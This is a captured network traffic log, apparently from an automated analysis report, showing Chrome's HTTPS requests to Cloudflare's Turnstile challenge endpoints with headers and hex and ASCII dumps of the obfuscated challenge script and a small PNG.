                                                                                                                                                                                                                                      15192.168.2.1649740104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe5cd656b664309&lang=auto HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:34 GMT
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 121560
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd696b9e8c75-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                                                                                                                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69
                                                                                                                                                                                                                                      Data Ascii: ndamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only_always_pass":"Testi
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 66 55 2c 66 59 2c 66 5a 2c 67 36 2c 67 66 2c 67 67 2c 67 47 2c 67 48 2c 67 64 2c 67 65 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 38 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 33 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 38 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 31 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 32 31 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67
                                                                                                                                                                                                                                      Data Ascii: fU,fY,fZ,g6,gf,gg,gG,gH,gd,ge){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(878))/1*(parseInt(gI(706))/2)+-parseInt(gI(1573))/3*(parseInt(gI(1258))/4)+-parseInt(gI(1511))/5*(parseInt(gI(1721))/6)+-parseInt(gI(977))/7+parseInt(g
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 45 2b 46 7d 2c 27 50 62 55 52 4c 27 3a 67 4d 28 31 31 37 34 29 2c 27 54 48 6e 70 71 27 3a 67 4d 28 36 30 34 29 2c 27 76 72 79 77 57 27 3a 67 4d 28 31 32 39 34 29 2c 27 61 72 50 50 73 27 3a 67 4d 28 31 36 31 38 29 2c 27 79 6c 4e 4f 59 27 3a 67 4d 28 31 30 35 32 29 7d 29 3b 74 72 79 7b 28 6a 3d 69 5b 67 4d 28 34 33 32 29 5d 28 65 4f 2c 66 5b 67 4d 28 35 38 39 29 5d 2c 66 5b 67 4d 28 37 39 34 29 5d 29 2c 66 5b 67 4d 28 35 38 39 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 67 4d 28 31 37 30 32 29 21 3d 3d 69 5b 67 4d 28 36 31 35 29 5d 3f 66 5b 67 4d 28 35 38 39 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 39 30 34 29 5d 28 66 5b 67 4d 28 35 38 39 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 34 32 36 29 5d 28 66 5b 67 4d 28 35 38 39 29 5d 29 29 3a 69 3d 28 46 3d
                                                                                                                                                                                                                                      Data Ascii: E+F},'PbURL':gM(1174),'THnpq':gM(604),'vrywW':gM(1294),'arPPs':gM(1618),'ylNOY':gM(1052)});try{(j=i[gM(432)](eO,f[gM(589)],f[gM(794)]),f[gM(589)]instanceof Error)?gM(1702)!==i[gM(615)]?f[gM(589)]=JSON[gM(904)](f[gM(589)],Object[gM(426)](f[gM(589)])):i=(F=
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 67 4e 28 33 32 30 29 5d 28 27 5c 6e 27 29 2c 6a 5b 67 4e 28 36 37 33 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 67 4e 28 39 38 35 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 70 61 72 73 65 49 6e 74 28 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 67 4e 28 31 31 35 39 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 29 3a 65 5b 67 4e 28 31 33 34 32 29 5d 28 65 5b 67 4e 28 33 33 37 29 5d 2c 67 4e 28 34 39 38 29 29 3f 66 3d 4a 53 4f 4e 5b 67 4e 28 39 30 34 29 5d 28 64 29 3a 64 28 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 4e 28 31 30 33 36 29 5d 3d 66 2c 6d 5b 67 4e 28 37 39 34 29 5d 3d 67 2c 6d 5b 67 4e 28 38 33 31 29 5d 3d 68 2c 6d 5b 67
                                                                                                                                                                                                                                      Data Ascii: gN(320)]('\n'),j[gN(673)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][gN(985)](k),l&&(g=l[1],h=parseInt(l[2],10),i=e[gN(1159)](parseInt,l[3],10))):e[gN(1342)](e[gN(337)],gN(498))?f=JSON[gN(904)](d):d();return m={},m[gN(1036)]=f,m[gN(794)]=g,m[gN(831)]=h,m[g
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 67 5b 68 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6d 5b 68 44 28 31 30 39 37 29 5d 5b 68 44 28 36 36 39 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 73 5b 68 44 28 31 30 39 37 29 5d 5b 68 44 28 31 33 35 31 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6e 5b 68 44 28 31 30 39 37 29 5d 5b 68 44 28 31 32 37 33 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6c 5b 68 44 28 31 30 39 37 29 5d 5b 68 44 28 35 35 30 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6f 5b 68 44 28 31 30 39 37 29 5d 5b 68 44 28 33 32 31 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 76 5b 68 44 28 31 30 39 32 29 5d 26 26 28 69 3d 7b 7d 2c 69 5b 68 44 28
                                                                                                                                                                                                                                      Data Ascii: ![];){switch(g[h++]){case'0':m[hD(1097)][hD(669)]();continue;case'1':s[hD(1097)][hD(1351)]();continue;case'2':n[hD(1097)][hD(1273)]();continue;case'3':l[hD(1097)][hD(550)]();continue;case'4':o[hD(1097)][hD(321)]();continue;case'5':v[hD(1092)]&&(i={},i[hD(
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 29 7b 69 66 28 69 6d 3d 67 4a 2c 6f 3d 7b 27 4b 70 50 77 73 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 57 59 6e 6a 49 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 54 56 62 4c 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 4f 6c 69 68 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 4d 55 4a 46 78 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 72 6e 49 55 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 45 7a 77 74 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49
                                                                                                                                                                                                                                      Data Ascii: ){if(im=gJ,o={'KpPws':function(G,H){return G===H},'WYnjI':function(G,H){return G+H},'TVbLl':function(G,H){return H===G},'OlihZ':function(G,H){return G(H)},'MUJFx':function(G,H,I,J){return G(H,I,J)},'rnIUl':function(G,H){return G(H)},'EzwtL':function(G,H,I
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 65 4d 5b 67 4a 28 31 33 31 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 31 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4a 29 7b 69 66 28 69 4a 3d 67 4a 2c 65 4d 5b 69 4a 28 31 33 31 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 4a 28 31 33 31 30 29 5d 3d 21 21 5b 5d 7d 2c 67 36 3d 30 2c 65 4e 5b 67 4a 28 36 37 37 29 5d 3d 3d 3d 67 4a 28 33 32 34 29 3f 65 4e 5b 67 4a 28 31 36 34 31 29 5d 28 67 4a 28 31 31 31 34 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 67 39 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 67 39 2c 30 29 2c 65 4d 5b 67 4a 28 39 34 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6a 34 2c 65 29 7b 65 3d 28 6a 34 3d 67 4a 2c 7b 27 74 73 6b 65 57 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                      Data Ascii: rn'o.'+s})},eM[gJ(1310)]=![],eM[gJ(1103)]=function(iJ){if(iJ=gJ,eM[iJ(1310)])return;eM[iJ(1310)]=!![]},g6=0,eN[gJ(677)]===gJ(324)?eN[gJ(1641)](gJ(1114),function(){setTimeout(g9,0)}):setTimeout(g9,0),eM[gJ(944)]=function(c,j4,e){e=(j4=gJ,{'tskeW':function(
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 72 6e 20 68 28 69 29 7d 2c 27 63 56 6a 4d 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 4d 4f 49 6f 4d 27 3a 6a 45 28 38 31 39 29 2c 27 53 45 43 77 46 27 3a 6a 45 28 31 35 38 35 29 2c 27 79 79 42 4e 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 61 70 75 67 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 4a 67 52 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 52 46 4a 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 61 6d 49 50 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 55
                                                                                                                                                                                                                                      Data Ascii: rn h(i)},'cVjMf':function(h,i){return h!==i},'MOIoM':jE(819),'SECwF':jE(1585),'yyBNL':function(h,i){return i==h},'apugt':function(h,i){return h(i)},'MJgRq':function(h,i){return h(i)},'YRFJm':function(h,i){return h(i)},'amIPQ':function(h,i){return h==i},'U
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC1369INData Raw: 74 75 72 6e 20 4f 2b 50 7d 2c 27 77 70 78 53 68 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2b 50 7d 2c 27 45 79 45 54 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2b 50 7d 2c 27 59 6a 43 49 58 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 49 29 7b 72 65 74 75 72 6e 20 6a 49 3d 62 2c 64 5b 6a 49 28 31 35 34 33 29 5d 28 4f 2c 50 29 7d 2c 27 6b 6a 41 52 75 27 3a 6a 4a 28 31 31 38 31 29 2c 27 5a 76 47 6a 6d 27 3a 6a 4a 28 31 30 35 32 29 2c 27 45 79 51 70 6f 27 3a 64 5b 6a 4a 28 33 39 34 29 5d 7d 2c 64 5b 6a 4a 28 31 30 34 39 29 5d 3d 3d 3d 64 5b 6a 4a 28 32 34 34 29 5d 29 50 3d 73 5b 6a 4a 28 31 33 30 34 29 5d 28 74 68 69 73 2e 68 5b 73 5b 6a 4a 28 31 33 30 34 29 5d 28 32 30 36 2c 74 68 69 73 2e 67
                                                                                                                                                                                                                                      Data Ascii: turn O+P},'wpxSh':function(O,P){return O+P},'EyETm':function(O,P){return O+P},'YjCIX':function(O,P,jI){return jI=b,d[jI(1543)](O,P)},'kjARu':jJ(1181),'ZvGjm':jJ(1052),'EyQpo':d[jJ(394)]},d[jJ(1049)]===d[jJ(244)])P=s[jJ(1304)](this.h[s[jJ(1304)](206,this.g


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      16192.168.2.1649741104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:34 GMT
                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd69e87941e0-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.1649742104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:35 GMT
                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd6db982f78f-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.1649743104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe5cd656b664309&lang=auto HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:35 GMT
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 115728
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd6f1d2f0f41-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                                                                                                                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64
                                                                                                                                                                                                                                      Data Ascii: oblem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21","turnstile_overrun_d
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 66 5a 2c 67 70 2c 67 71 2c 67 72 2c 67 76 2c 67 77 2c 67 44 2c 67 48 2c 66 57 2c 66 58 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 38 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 35 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 30 32 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 36 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 37 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 36 36 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 30 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67
                                                                                                                                                                                                                                      Data Ascii: fZ,gp,gq,gr,gv,gw,gD,gH,fW,fX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(488))/1*(-parseInt(gI(1656))/2)+-parseInt(gI(1402))/3+-parseInt(gI(836))/4+-parseInt(gI(1187))/5*(-parseInt(gI(1466))/6)+-parseInt(gI(510))/7+parseInt(g
